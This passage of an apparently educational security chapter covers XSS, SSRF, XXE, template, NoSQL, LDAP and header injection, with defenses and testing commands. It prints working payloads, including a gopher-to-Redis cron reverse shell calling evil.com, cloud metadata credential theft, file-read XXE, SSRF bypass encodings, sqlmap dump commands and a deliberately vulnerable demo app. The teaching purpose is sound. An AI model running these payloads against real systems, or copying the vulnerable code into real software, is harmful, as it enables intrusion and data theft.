HttpOnlyprevents JavaScript from reading the cookie viadocument.cookie, neutralizing cookie-theft XSS attacksSecureensures the cookie is only sent over HTTPSSameSite=Strictprevents the cookie from being sent in cross-site requests, mitigating CSRF
5. DOMPurify for user-generated HTML:
// When you MUST allow some HTML (rich text editors, markdown rendering)
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(dirtyHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
ALLOWED_ATTR: ['href'],
ALLOW_DATA_ATTR: false
});
element.innerHTML = clean;
Test a page for reflected XSS:
~~~bash
# Basic test -- does the server reflect input without encoding?
curl -s "https://example.com/search?q=<script>alert(1)</script>" \
| grep -o '<script>alert(1)</script>'
# If the literal script tag appears -- the page is vulnerable
# If you see <script> -- the output is properly encoded
# Test with various payloads
curl -s "https://example.com/search?q=<img+src=x+onerror=alert(1)>"
curl -s "https://example.com/search?q=\"onmouseover=alert(1)+\""
# Check CSP headers
curl -sI "https://example.com/" | grep -i content-security-policy
# Check cookie flags
curl -sI "https://example.com/login" | grep -i set-cookie
# Look for: HttpOnly; Secure; SameSite=Strict (or Lax)
~~~
Use browser developer tools: open the Console tab, attempt to inject `<img src=x onerror=console.log('XSS')>` through various input fields, and observe whether the script executes or is encoded.
Server-Side Request Forgery (SSRF)
SSRF is an attack where you do not inject code at all -- you inject a destination. You trick the server into making requests on your behalf to places you cannot reach directly.
What Is SSRF?
SSRF occurs when an application fetches a URL specified by the user, and the attacker makes it request internal resources that should not be accessible from outside.
Vulnerable code:
@app.route('/fetch')
def fetch_url():
url = request.args.get('url')
response = requests.get(url)
return response.text
Normal use:
GET /fetch?url=https://api.example.com/data
SSRF attack -- cloud metadata theft:
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
The IP 169.254.169.254 is the AWS Instance Metadata Service (IMDS). From outside, it is unreachable -- it is a link-local address that only responds to requests from the EC2 instance itself. But the server can reach it -- and it returns the server's IAM credentials, which may grant access to S3 buckets, databases, and other AWS services.
sequenceDiagram
participant Attacker
participant WebApp as Web Application<br/>(EC2 Instance)
participant IMDS as AWS Metadata Service<br/>(169.254.169.254)
participant S3 as AWS S3 Buckets
Attacker->>WebApp: GET /fetch?url=http://169.254.169.254/<br/>latest/meta-data/iam/security-credentials/
WebApp->>IMDS: GET /latest/meta-data/iam/security-credentials/
IMDS-->>WebApp: my-ec2-role
WebApp-->>Attacker: "my-ec2-role"
Attacker->>WebApp: GET /fetch?url=http://169.254.169.254/<br/>latest/meta-data/iam/security-credentials/my-ec2-role
WebApp->>IMDS: GET /latest/meta-data/iam/<br/>security-credentials/my-ec2-role
IMDS-->>WebApp: {"AccessKeyId": "AKIA...",<br/>"SecretAccessKey": "wJalr...",<br/>"Token": "IQoJb3..."}
WebApp-->>Attacker: IAM credentials in plain text
Note over Attacker: Attacker now has temporary AWS credentials
Attacker->>S3: aws s3 ls --profile stolen
S3-->>Attacker: List of all S3 buckets<br/>customer-data-prod/<br/>backups-2024/<br/>financial-reports/
Attacker->>S3: aws s3 cp s3://customer-data-prod . --recursive
S3-->>Attacker: Millions of customer records downloaded
SSRF Attack Targets Beyond Cloud Metadata
# Internal services not exposed to the internet
GET /fetch?url=http://10.0.1.50:8080/admin # Internal admin panel
GET /fetch?url=http://10.0.1.60:6379/ # Redis (no auth by default)
GET /fetch?url=http://10.0.1.70:9200/_cluster/health # Elasticsearch
GET /fetch?url=http://10.0.1.80:5601/api/status # Kibana
GET /fetch?url=http://10.0.1.90:2375/containers/json # Docker API (RCE!)
GET /fetch?url=http://localhost:8500/v1/agent/members # Consul
# Cloud metadata endpoints
GET /fetch?url=http://169.254.169.254/... # AWS IMDSv1
GET /fetch?url=http://metadata.google.internal/... # GCP
GET /fetch?url=http://169.254.169.254/metadata/... # Azure
# Internal port scanning
GET /fetch?url=http://10.0.1.1:22 # If timeout: filtered. If error: open.
GET /fetch?url=http://10.0.1.1:3306 # Map the entire internal network
# Protocol smuggling
GET /fetch?url=gopher://10.0.1.60:6379/_SET%20pwned%20true # Redis commands via gopher
GET /fetch?url=file:///etc/passwd # Local file read
GET /fetch?url=dict://10.0.1.60:6379/INFO # Redis INFO via dict protocol
The Capital One Breach (2019)
The Capital One breach -- one of the largest data breaches in US financial history -- was an SSRF attack.
A misconfigured WAF on an EC2 instance allowed the attacker to send a request through Capital One's infrastructure to the AWS metadata endpoint. The returned IAM role credentials had overly broad S3 permissions. The attacker used them to access S3 buckets containing 100 million credit card applications with names, addresses, credit scores, and Social Security numbers.
The attack chain:
- SSRF through the WAF to
169.254.169.254 - Retrieved IAM credentials for the
*-WAF-Role - The role had
s3:GetObjectands3:ListBucketon all S3 buckets - Downloaded 700+ S3 buckets containing customer data
- Total impact: 100 million US customers, 6 million Canadian customers
The total cost to Capital One exceeded $300 million including regulatory fines, legal settlements, and remediation costs. The attacker was a former AWS employee who understood the metadata service intimately.
A fintech company had a "URL preview" feature -- paste a link, and the app fetches the page to generate a thumbnail. Classic SSRF goldmine.
An attacker discovered they could fetch `http://localhost:6379/`, which was the internal Redis instance running without authentication (default Redis configuration). They injected Redis commands through the URL path using the gopher protocol:
gopher://127.0.0.1:6379/_3%0d%0a$3%0d%0aSET%0d%0a$11%0d%0ashell_cmd%0d%0a$64%0d%0a/1 * * * * /bin/bash -c 'bash -i >& /dev/tcp/evil.com/4444 0>&1'%0d%0a*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a...
They wrote a cron job to the server's filesystem using Redis's `CONFIG SET dir` and `CONFIG SET dbfilename` trick, and gained a reverse shell. From "paste a URL" to full server compromise in under an hour.
The fix required: allowlisting outbound URLs, blocking private IP ranges after DNS resolution, switching Redis to require authentication, and deploying IMDSv2 on all EC2 instances.
SSRF Bypass Techniques
Attackers bypass naive URL validation with creative encodings and redirects:
| Technique | Example | What it resolves to |
|---|---|---|
| Decimal IP | http://2130706433/ | 127.0.0.1 |
| Hex IP | http://0x7f000001/ | 127.0.0.1 |
| Octal IP | http://0177.0.0.1/ | 127.0.0.1 |
| IPv6 | http://[::1]/ | 127.0.0.1 |
| IPv6 mapped | http://[::ffff:127.0.0.1]/ | 127.0.0.1 |
| Zero shorthand | http://0/ | 0.0.0.0 (some systems: localhost) |
| URL auth | http://evil.com@127.0.0.1/ | 127.0.0.1 |
| DNS rebinding | Custom domain | First resolves public, then private |
| Redirects | http://evil.com/redir | 302 → http://169.254.169.254/ |
| nip.io | http://127.0.0.1.nip.io/ | 127.0.0.1 |
| Enclosed alphanumeric | http://①②⑦.⓪.⓪.①/ | 127.0.0.1 (some parsers) |
SSRF Defense
-
Allowlist, not blocklist. Only allow requests to known, specific domains or IP ranges. Blocklists always have gaps.
-
Use IMDSv2 (on AWS). Requires a token obtained via a PUT request with a special header, which standard SSRF through GET requests cannot provide:
# IMDSv2 requires a two-step process:
# Step 1: Get a token via PUT (SSRF via GET cannot do this)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# Step 2: Use the token for metadata requests
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
"http://169.254.169.254/latest/meta-data/"
# Enforce IMDSv2 (disable IMDSv1) on all EC2 instances:
aws ec2 modify-instance-metadata-options \
--instance-id i-1234567890abcdef0 \
--http-tokens required \
--http-endpoint enabled
- Validate resolved IP addresses after DNS resolution:
import ipaddress
import socket
from urllib.parse import urlparse
def is_safe_url(url):
"""Validate that a URL does not point to internal resources."""
parsed = urlparse(url)
# Only allow http and https
if parsed.scheme not in ('http', 'https'):
return False
# Reject URLs with authentication components (user@host)
if parsed.username or parsed.password:
return False
# Resolve hostname to IP
try:
ip = socket.gethostbyname(parsed.hostname)
except socket.gaierror:
return False
addr = ipaddress.ip_address(ip)
# Block private, loopback, link-local, and reserved addresses
if (addr.is_private or addr.is_loopback or
addr.is_link_local or addr.is_reserved or
addr.is_multicast):
return False
return True
- Pin the resolved IP and use it for the actual request to defeat DNS rebinding:
import socket
import requests
from urllib.parse import urlparse
def safe_fetch(url):
parsed = urlparse(url)
# Resolve DNS once
ip = socket.gethostbyname(parsed.hostname)
# Validate the resolved IP
if not is_public_ip(ip):
raise ValueError("URL resolves to private IP")
# Make the request using the pinned IP
# Override the Host header to maintain virtual hosting
pinned_url = url.replace(parsed.hostname, ip)
response = requests.get(
pinned_url,
headers={'Host': parsed.hostname},
allow_redirects=False, # Don't follow redirects (could redirect to internal)
timeout=5
)
return response
-
Network-level controls: Use firewall rules to prevent the application server from reaching the metadata endpoint or internal services it does not need. AWS VPC endpoints and security groups are more reliable than application-level validation.
-
Disable unnecessary URL schemes. Block
file://,gopher://,dict://,ftp://,ldap://.
DNS rebinding can bypass IP validation. The hostname resolves to a public IP during validation, then to a private IP during the actual request (the attacker's DNS server returns different IPs with short TTLs). To defend against this:
- Pin the resolved IP and use it for the actual request (shown above)
- Use a dedicated DNS resolver that blocks private IP responses for external domains
- Disable `allow_redirects` -- the redirect target could be an internal URL
- Set a connection timeout to limit how long the resolution window is open
Cross-Pollination: Injection Chains
In real breaches, attackers almost always chain vulnerabilities. A single vulnerability gives a foothold; chains give full compromise.
graph TD
A[XSS: Steal admin session cookie] --> B[Authenticated access to admin panel]
B --> C[Admin panel has SSRF via webhook feature]
C --> D[SSRF: Access internal code review tool]
D --> E[Find database credentials in code]
E --> F[SQL injection on internal service<br/>using discovered credentials]
F --> G[Full database dump]
H[SSRF: Access internal Redis] --> I[Redis: Write SSH key to authorized_keys]
I --> J[SSH access to internal server]
J --> K[Credential harvesting from .env files]
K --> L[Pivot to production database]
style G fill:#ff6b6b,stroke:#c0392b,color:#fff
style L fill:#ff6b6b,stroke:#c0392b,color:#fff
Common attack chains in the wild:
-
SSRF -> Credential Theft -> Database Compromise: Use SSRF to access cloud metadata, steal IAM credentials, access databases directly (Capital One)
-
Stored XSS -> Session Hijacking -> Admin Access -> RCE: Plant XSS payload, steal admin cookies, access admin panel with file upload, upload webshell
-
SQL Injection -> File Read -> Source Code -> More Injection: Use
LOAD_FILE()to read application source code, find additional injection points and credentials -
Command Injection -> Reverse Shell -> Lateral Movement: Execute a reverse shell, pivot to internal network, discover and exploit unpatched services
This is why every service, even internal ones, must validate input and use parameterized queries. "It's behind the firewall" is not a security control -- it is an assumption about the network that will eventually be proven wrong.
Injection in Non-Traditional Contexts
Injection is not limited to SQL and shell commands. Any interpreter is a target.
LDAP Injection
# Normal LDAP query
(&(username=arjun)(password=secret))
# Injected username: *)(&
# Result: (&(username=*)(&)(password=anything))
# The * matches all usernames, the (&) is always true
# The attacker authenticates as the first user in the directory
# Defense: escape LDAP special characters (* ( ) \ / NUL)
# Use LDAP SDKs that provide parameterized search filters
XML Injection (XXE -- XML External Entity)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
</user>
The XML parser resolves the entity, reading /etc/passwd and including its contents in the response. XXE can also be used for SSRF:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
Defense: Disable external entity resolution in the XML parser:
# Python (lxml)
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
# Java (DocumentBuilderFactory)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
Template Injection (SSTI -- Server-Side Template Injection)
# Jinja2 -- VULNERABLE if user input IS the template
from jinja2 import Template
template = Template(user_input) # user_input controls the template itself
template.render()
# If user_input is: {{ config.items() }}
# Returns the application's entire configuration including secret keys
# If user_input is: {{ ''.__class__.__mro__[1].__subclasses__() }}
# Returns all Python classes -- can be used for RCE
# SAFE: user input as DATA, not template
template = Template("Hello, {{ name }}")
template.render(name=user_input)
NoSQL Injection
// MongoDB -- VULNERABLE
db.users.find({
username: req.body.username,
password: req.body.password
});
// Attacker sends JSON body:
// { "username": "admin", "password": { "$ne": "" } }
// Query becomes: find where username='admin' AND password != ''
// Matches the admin account regardless of actual password
// Another attack:
// { "username": { "$gt": "" }, "password": { "$gt": "" } }
// Returns all users where username and password are non-empty
// Defense: validate input types strictly
if (typeof req.body.password !== 'string') {
return res.status(400).json({error: 'Invalid input type'});
}
// Or use a schema validator like Joi or Zod
const schema = Joi.object({
username: Joi.string().required().max(100),
password: Joi.string().required().max(200)
});
Header Injection (CRLF Injection)
# VULNERABLE -- user input in HTTP header
@app.route('/redirect')
def redirect():
url = request.args.get('url')
response = make_response('', 302)
response.headers['Location'] = url
return response
# Attacker input: /home%0d%0aSet-Cookie:%20admin=true
# Results in injected header:
# Location: /home
# Set-Cookie: admin=true
Practical Detection and Testing
Static Analysis -- Finding Injection Before Production
# Search for SQL injection patterns in Python code
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE\|\.format.*SELECT" src/
grep -rn "\.raw(f\"\|\.extra(where=" src/
# Search for command injection patterns
grep -rn "os\.system\|os\.popen\|subprocess.*shell=True" src/
# Search for XSS patterns (missing escaping)
grep -rn "innerHTML\|outerHTML\|document\.write\|\.html(" src/
grep -rn "dangerouslySetInnerHTML\|v-html" src/
# Use Semgrep for more sophisticated detection
semgrep --config=p/owasp-top-ten src/
semgrep --config=p/python.flask src/
semgrep --config=p/javascript.express src/
# Use Bandit for Python security analysis
bandit -r src/ -ll
Runtime Testing with sqlmap
# Test a GET parameter with full enumeration
sqlmap -u "http://target.com/page?id=1" \
--batch --level=3 --risk=2 \
--threads=4
# Test a POST form
sqlmap -u "http://target.com/login" \
--data="username=test&password=test" \
--batch
# Test with authentication cookie
sqlmap -u "http://target.com/api/data?id=1" \
--cookie="session=abc123" --batch
# Test JSON API
sqlmap -u "http://target.com/api/users" \
--data='{"id":1}' \
--content-type="application/json" --batch
# Enumerate everything
sqlmap -u "http://target.com/page?id=1" \
--dbs \
--tables \
--columns \
--dump \
--batch
XSS and Header Testing with curl
# Check if reflected input is encoded
curl -s "http://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E" \
| grep -c '<script>alert(1)</script>'
# Result > 0 means vulnerable (script tag rendered literally)
# Check security headers
curl -sI "http://target.com/" \
| grep -iE '(content-security|x-frame|x-content-type|strict-transport)'
# Check SSRF potential
curl -s "http://target.com/fetch?url=http://169.254.169.254/"
# If this returns metadata -- SSRF exists
Create a test harness to practice injection detection and fixing:
~~~python
# vulnerable_app.py -- for LOCAL TESTING ONLY
from flask import Flask, request
import sqlite3
app = Flask(__name__)
def init_db():
conn = sqlite3.connect(':memory:')
conn.execute("CREATE TABLE items (id INTEGER, name TEXT, price REAL)")
conn.execute("INSERT INTO items VALUES (1, 'Widget', 9.99)")
conn.execute("INSERT INTO items VALUES (2, 'Gadget', 19.99)")
conn.commit()
return conn
DB = init_db()
@app.route('/search')
def search():
q = request.args.get('q', '')
# DELIBERATELY VULNERABLE -- for learning
results = DB.execute(f"SELECT * FROM items WHERE name LIKE '%{q}%'").fetchall()
return f"<h1>Results for: {q}</h1><pre>{results}</pre>"
if __name__ == '__main__':
app.run(debug=True, port=5000)
~~~
Then fix it:
~~~python
# secure_app.py
from flask import Flask, request
from markupsafe import escape
import sqlite3
app = Flask(__name__)
@app.route('/search')
def search():
q = request.args.get('q', '')
conn = sqlite3.connect(':memory:')
# PARAMETERIZED QUERY -- immune to SQL injection
results = conn.execute(
"SELECT * FROM items WHERE name LIKE ?",
(f'%{q}%',)
).fetchall()
# OUTPUT ENCODING -- immune to XSS
return f"<h1>Results for: {escape(q)}</h1><pre>{escape(str(results))}</pre>"
~~~
Test both versions:
~~~bash
# Against vulnerable version -- returns all items
curl "http://localhost:5000/search?q=' OR '1'='1"
# Against secure version -- returns no matches (searches for literal string)
curl "http://localhost:5000/search?q=' OR '1'='1"
~~~
What You've Learned
This chapter covered the fundamental injection attack categories that continue to dominate real-world breaches:
-
SQL Injection -- classic, blind (boolean and time-based), UNION-based, and second-order. The fix is parameterized queries, not escaping. Parameterization works because the query structure is compiled before data is seen -- the parser cannot be confused. Every query, every time, even for "trusted" data from your own database.
-
Command Injection -- OS command execution through shell metacharacters. The fix is avoiding
system()calls entirely, or using array-based execution (subprocess.run(["cmd", "arg"])) that bypasses the shell. When the shell is not involved, metacharacters have no special meaning. -
Cross-Site Scripting (XSS) -- reflected, stored, and DOM-based. The fix is context-aware output encoding, CSP headers with nonces, and HttpOnly cookies. Template engines with auto-escaping are your primary defense. Use DOMPurify when you must render user-generated HTML.
-
Server-Side Request Forgery (SSRF) -- making the server request internal resources. The fix is URL allowlisting, IP validation after DNS resolution with pinning, IMDSv2 on cloud platforms, and network-level restrictions. The Capital One breach demonstrated the catastrophic potential.
-
The common thread -- all injection attacks exploit the mixing of data and code in the same channel. Separating these channels (parameterized queries, array-based command execution, auto-escaping templates, URL allowlists) is the architectural solution. The attacker's strategy is always the same: find where data crosses into an interpreter and make it execute.
The pattern is always the same: untrusted data gets interpreted as instructions. Different interpreters, different syntax, same fundamental mistake. If you internalize one principle from this chapter, let it be this: data must never become code unless you explicitly intend it to. Build your systems so that this separation is the default, and you will eliminate entire classes of vulnerabilities before they ever appear.
When you see string concatenation building a query or command, fix it. Then add a linter rule so nobody can write it again. Then check the git history to see how long it has been there -- and start incident response if the answer is "long enough."